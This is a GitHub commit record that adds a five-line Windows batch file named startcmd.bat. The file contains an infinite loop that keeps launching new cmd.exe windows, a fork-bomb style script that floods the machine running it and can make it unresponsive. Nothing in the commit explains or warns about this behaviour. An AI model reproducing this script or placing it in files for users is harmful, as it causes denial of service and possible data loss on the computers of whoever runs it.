Create startcmd.bat

This commit is contained in:
Yann
2023-03-30 21:21:19 +02:00
committed by GitHub
parent 2cbdfb5ad5
commit 8b4733364c
+5
View File
@@ -0,0 +1,5 @@
@echo off
:a
start cmd.exe
goto a